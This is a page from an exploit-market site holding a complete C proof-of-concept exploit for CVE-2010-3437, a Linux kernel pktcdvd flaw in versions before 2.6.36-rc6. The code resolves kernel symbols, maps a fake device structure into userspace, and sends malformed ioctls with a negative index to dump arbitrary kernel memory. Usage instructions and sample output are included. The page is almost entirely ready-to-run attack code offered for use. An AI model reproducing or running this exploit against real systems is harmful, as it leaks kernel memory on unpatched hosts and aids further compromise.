[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure

Author
Jon Oberheide
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14260
Category
local exploits
Date add
30-09-2010
Platform
linux
==========================================================
Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure
==========================================================

/*
 * cve-2010-3437.c
 *
 * Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   https://bugzilla.redhat.com/show_bug.cgi?id=638085
 *
 *   The PKT_CTRL_CMD_STATUS device ioctl retrieves a pointer to a
 *   pktcdvd_device from the global pkt_devs array.  The index into this
 *   array is provided directly by the user and is a signed integer, so the
 *   comparison to ensure that it falls within the bounds of this array will
 *   fail when provided with a negative index.
 *
 * Usage:
 *
 *   $ gcc cve-2010-3437.c -o cve-2010-3437
 *   $ ./cve-2010-3437
 *   usage: ./cve-2010-3437 <address> <length>
 *   $ ./cve-2010-3437 0xc0102290 64
 *   [+] searching for pkt_devs kernel symbol...
 *   [+] found pkt_devs at 0xc086fcc0
 *   [+] opening pktcdvd device...
 *   [+] calculated dereference address of 0x790070c0
 *   [+] mapping page at 0x79007000 for pktcdvd_device dereference...
 *   [+] setting up fake pktcdvd_device structure...
 *   [+] dumping kmem from 0xc0102290 to 0xc01022d0 via malformed ioctls...
 *   [+] dumping kmem to output...
 *
 *   55 89 e5 0f 1f 44 00 00 8b 48 3c 8b 50 04 8b ...
 *   55 89 e5 57 56 53 0f 1f 44 00 00 89 d3 89 e2 ...
 *
 * Notes:
 *
 *   Pass the desired kernel memory address and dump length as arguments.
 *
 *   We can disclose 4 bytes of arbitrary kernel memory per ioctl call by
 *   specifying a large negative device index, causing the kernel to
 *   dereference to our fake pktcdvd_device structure in userspace and copy
 *   data to userspace from an attacker-controlled address.  Since only 4
 *   bytes of kmem are disclosed per ioctl call, large dump sizes may take a
 *   few seconds.
 *
 *   Tested on Ubuntu Lucid 10.04.  32-bit only for now.
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/utsname.h>
#include <sys/mman.h>
 
#define DEV_INDEX -300000000
#define PAGE_SIZE 4096
#define PKT_CTRL_CMD_STATUS 2
 
struct pkt_ctrl_command {
    uint32_t command;
    int32_t dev_index;
    uint32_t dev;
    uint32_t pkt_dev;
    uint32_t num_devices;
    uint32_t padding;
};
 
#define PACKET_IOCTL_MAGIC ('X')
#define PACKET_CTRL_CMD _IOWR(PACKET_IOCTL_MAGIC, 1, struct pkt_ctrl_command)
 
struct block_device {
    uint32_t bd_dev;
} bd;
 
struct pktcdvd_device {
    struct block_device *bdev;
} pd;
 
#define MINORBITS 20
#define MKDEV(ma,mi) (((ma) << MINORBITS) | (mi))
 
uint32_t
new_decode_dev(uint32_t dev)
{
    unsigned major = (dev & 0xfff00) >> 8;
    unsigned minor = (dev & 0xff) | ((dev >> 12) & 0xfff00);
    return MKDEV(major, minor);
}
 
const char hex_asc[] = "0123456789abcdef";
#define hex_asc_lo(x) hex_asc[((x) & 0x0f)]
#define hex_asc_hi(x) hex_asc[((x) & 0xf0) >> 4]
 
void
hex_dump_to_buffer(const void *buf, size_t len, int rowsize, int groupsize, char *linebuf, size_t linebuflen, int ascii)
{
    const uint8_t *ptr = buf;
    uint8_t ch;
    int j, lx = 0;
    int ascii_column;
 
    if (rowsize != 16 && rowsize != 32)
        rowsize = 16;
 
    if (!len)
        goto nil;
    if (len > rowsize)
        len = rowsize;
    if ((len % groupsize) != 0)
        groupsize = 1;
 
    switch (groupsize) {
    case 8: {
        const uint64_t *ptr8 = buf;
        int ngroups = len / groupsize;
 
        for (j = 0; j < ngroups; j++)
            lx += snprintf(linebuf + lx, linebuflen - lx,
                "%16.16llx ", (unsigned long long)*(ptr8 + j));
        ascii_column = 17 * ngroups + 2;
        break;
    }
 
    case 4: {
        const uint32_t *ptr4 = buf;
        int ngroups = len / groupsize;
 
        for (j = 0; j < ngroups; j++)
            lx += snprintf(linebuf + lx, linebuflen - lx,
                "%8.8x ", *(ptr4 + j));
        ascii_column = 9 * ngroups + 2;
        break;
    }
 
    case 2: {
        const uint16_t *ptr2 = buf;
        int ngroups = len / groupsize;
 
        for (j = 0; j < ngroups; j++)
            lx += snprintf(linebuf + lx, linebuflen - lx,
                "%4.4x ", *(ptr2 + j));
        ascii_column = 5 * ngroups + 2;
        break;
    }
 
    default:
        for (j = 0; (j < rowsize) && (j < len) && (lx + 4) < linebuflen;
             j++) {
            ch = ptr[j];
            linebuf[lx++] = hex_asc_hi(ch);
            linebuf[lx++] = hex_asc_lo(ch);
            linebuf[lx++] = ' ';
        }
        ascii_column = 3 * rowsize + 2;
        break;
    }
    if (!ascii)
        goto nil;
 
    while (lx < (linebuflen - 1) && lx < (ascii_column - 1))
        linebuf[lx++] = ' ';
    for (j = 0; (j < rowsize) && (j < len) && (lx + 2) < linebuflen; j++)
        linebuf[lx++] = (isascii(ptr[j]) && isprint(ptr[j])) ? ptr[j]
                : '.';
nil:
    linebuf[lx++] = '\0';
}
 
void
print_hex_dump(int rowsize, int groupsize, const void *buf, size_t len, int ascii)
{
    const uint8_t *ptr = buf;
    int i, linelen, remaining = len;
    unsigned char linebuf[200];
 
    if (rowsize != 16 && rowsize != 32)
        rowsize = 16;
 
    for (i = 0; i < len; i += rowsize) {
        linelen = ((remaining) < (rowsize) ? (remaining) : (rowsize));
        remaining -= rowsize;
        hex_dump_to_buffer(ptr + i, linelen, rowsize, groupsize,
        linebuf, sizeof(linebuf), ascii);
        printf("%s\n", linebuf);
    }
}
 
unsigned long
get_kernel_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    struct utsname ver;
    char dummy, sname[512];
    int ret, rep = 0, oldstyle = 0;
 
    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL) {
            goto fallback;
        }
        oldstyle = 1;
    }
 
repeat:
    ret = 0;
    while(ret != EOF) {
        if (!oldstyle) {
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        } else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
                    continue;
                }
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_') {
                        p--;
                    }
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            fclose(f);
            return addr;
        }
    }
 
    fclose(f);
    if (rep) {
        return 0;
    }
fallback:
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3)) {
        oldstyle = 1;
    }
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL) {
        return 0;
    }
    rep = 1;
    goto repeat;
}
 
void
usage(char **argv)
{
    fprintf(stderr, "usage: %s <address> <length>\n", argv[0]);
    exit(1);
}
 
int
main(int argc, char **argv)
{
    int fd, ret, length;
    void *mem, *dump, *ptr;
    struct pkt_ctrl_command cmd;
    unsigned long pkt_devs, map_addr, deref_addr;
    unsigned long start_addr, end_addr, curr_addr;
 
    if (argc < 3) {
        usage(argv);
    }
 
    start_addr = strtoul(argv[1], NULL, 0);
    length = strtoul(argv[2], NULL, 0);
    end_addr = start_addr + length;
 
    dump = malloc(length);
    if (!dump) {
        printf("[-] failed to allocate memory for kmem dump\n");
        exit(1);
    }
    memset(dump, 0, length);
 
    printf("[+] searching for pkt_devs kernel symbol...\n");
 
    pkt_devs = get_kernel_symbol("pkt_devs");
    if (!pkt_devs) {
        printf("[-] could not find pkt_devs kernel symbol\n");
        exit(1);
    }
     
    printf("[+] found pkt_devs at %p\n", (void *) pkt_devs);
 
    printf("[+] opening pktcdvd device...\n");
 
    fd = open("/dev/pktcdvd/control", O_RDWR);
    if (fd < 0) {
        printf("[-] open of pktcdvd device failed\n");
        exit(1);
    }
 
    deref_addr = pkt_devs + (DEV_INDEX * sizeof(void *));
    map_addr = deref_addr & ~(PAGE_SIZE-1);
 
    printf("[+] calculated dereference address of %p\n", (void *) deref_addr);
    printf("[+] mapping page at %p for pktcdvd_device dereference...\n", (void *) map_addr);
 
    mem = mmap((void *) map_addr, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    if (mem == MAP_FAILED) {
        printf("[-] mmap failed\n");
        exit(1);
    }
 
    printf("[+] setting up fake pktcdvd_device structure...\n");
 
    *(unsigned long *) deref_addr = (unsigned long) &pd;
 
    printf("[+] dumping kmem from %p to %p via malformed ioctls...\n", (void *) start_addr, (void *) end_addr);
 
    memset(&cmd, 0, sizeof(cmd));
    cmd.command = PKT_CTRL_CMD_STATUS;
    cmd.dev_index = DEV_INDEX;
 
    ptr = dump;
    curr_addr = start_addr;
 
    while (curr_addr < end_addr) {
        pd.bdev = (struct block_device *) curr_addr;
 
        ret = ioctl(fd, PACKET_CTRL_CMD, &cmd);
        if (ret < 0) {
            printf("[-] ioctl of pktcdvd device failed\n");
            exit(1);
        }
 
        *(uint32_t *) ptr = (uint32_t) new_decode_dev(cmd.dev);
 
        curr_addr += sizeof(uint32_t);
        ptr += sizeof(uint32_t);
    }
 
    printf("[+] dumping kmem to output...\n");
 
    printf("\n");
    print_hex_dump(32, 1, dump, length, 1);
    printf("\n");
 
    return 0;
}



#  0day.today [2024-12-23]  #